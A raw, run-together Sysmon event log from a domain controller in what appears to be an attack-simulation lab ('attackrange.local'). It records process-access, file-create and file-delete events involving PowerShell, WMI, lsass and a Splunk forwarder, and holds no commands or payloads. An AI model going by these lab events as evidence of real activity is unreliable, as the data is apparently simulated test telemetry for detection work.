16:54:03.767{05ADC7E1-6DAB-603E-C0AA-00000000AD01}4112\PSHost.132591776436125012.4112.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 10341000x80000000000000002240733Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.748{05ADC7E1-229F-6039-1600-00000000AD01}154010492C:\Windows\system32\svchost.exe{05ADC7E1-6DAB-603E-BDAA-00000000AD01}15852C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240732Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.748{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6DAB-603E-BDAA-00000000AD01}15852C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002240731Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.748{05ADC7E1-6DAB-603E-C0AA-00000000AD01}4112ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_zpcst2o2.pxb.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002240730Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.748{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=220AF8E04466A8F74A7961007026B0CB,SHA256=2ED8C6A27208EA507964779B66E987DA36EA033A796D590670DD9A44DED7C06F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002240729Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.748{05ADC7E1-6DAB-603E-C0AA-00000000AD01}4112ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_t0oj2pmb.44z.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002240728Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.748{05ADC7E1-6DAB-603E-BFAA-00000000AD01}653614680C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002240727Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.732{05ADC7E1-6DAB-603E-BBAA-00000000AD01}14536ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000002240726Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.732{05ADC7E1-6DAB-603E-C0AA-00000000AD01}4112C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_t0oj2pmb.44z.ps12021-03-02 16:54:03.732 23542300x80000000000000002240725Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.717{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EB4245AA962EBC7B58130A9088FB0E8C,SHA256=8024B4C2BE0A262336BB1A389764984DCDE5D19DB03357C7B11D238093797CCD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002240724Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.701{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-6DAB-603E-C0AA-00000000AD01}4112C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240723Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.701{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DAB-603E-C1AA-00000000AD01}11600C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240722Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.701{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DAB-603E-C0AA-00000000AD01}4112C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240721Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.701{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DAB-603E-BFAA-00000000AD01}6536C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240720Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.701{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DAB-603E-BEAA-00000000AD01}11800C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240719Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.701{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DAB-603E-BDAA-00000000AD01}15852C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240718Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.701{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DAB-603E-BCAA-00000000AD01}9400C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240717Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.701{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DAB-603E-BBAA-00000000AD01}14536C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240716Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.701{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CB1-603E-35AA-00000000AD01}14828C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240715Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.701{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240714Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.701{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CAF-603E-33AA-00000000AD01}8188C:\Windows\system32\DllHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240713Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.701{05ADC7E1-229D-6039-0B00-00000000AD01}85216356C:\Windows\system32\lsass.exe{05ADC7E1-6DAB-603E-BDAA-00000000AD01}15852C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240712Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.701{05ADC7E1-229D-6039-0B00-00000000AD01}85216356C:\Windows\system32\lsass.exe{05ADC7E1-6DAB-603E-BDAA-00000000AD01}15852C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240711Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.701{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240710Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.701{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002240709Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.701{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=220F96D7C6BD61745AE0C2D88DC0DFEA,SHA256=005E051F3033F3C494FE5E40EF7872D6EBF10B149D73CE096A0841ED57D07996,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002240708Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.701{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240707Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 